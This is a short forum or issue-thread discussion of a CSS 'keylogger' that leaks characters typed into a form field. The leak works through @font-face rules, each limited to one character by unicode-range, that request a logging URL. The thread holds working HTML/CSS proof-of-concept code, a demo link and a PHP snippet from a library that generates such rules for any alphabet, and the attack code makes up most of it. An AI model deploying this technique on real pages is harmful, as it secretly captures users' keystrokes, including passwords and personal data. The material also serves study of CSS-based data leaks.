Keylogger using webfont with single character unicode-range

[myfonj]

Sure, again just a single request per unique character during page visit could be sent, but besides that it seems to work as expected:

<!doctype html>
<title>css keylogger</title>
<style>
@font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
@font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
@font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
@font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
input { font-family: x, 'Comic sans ms'; }
</style>
<input value="a">type `bcd` and watch network log

[julianYaman]

Why do you not make a pull request with these changes :D

[Bogdaan]

@myfonj briliant idia. Live demo - https://jsfiddle.net/hcbogdan/6hmm2z47/

[jbtronics]

Very cool idea. Seems interesting. The problem is that we can only detect if a user types a char for the first time... But with word lists it should maybe possible to guess the text a user has typed (at least when it is only a single word...)

[Bogdaan]

I wrote some code at
https://github.com/Bogdaan/spycss/blob/master/src/Interaction/Keylogger.php

Witch generates valid unicode-range: U+XXXX from alplabet.

For example:

// set alphabet
$logThisChars = 'abcdefgABCDEFG';

// create input field
echo $s->builder()
    ->tag('input')
    ->attribute('name', 'field')
    ->interactions([
        new Keylogger($logThisChars)
    ])
    ->get();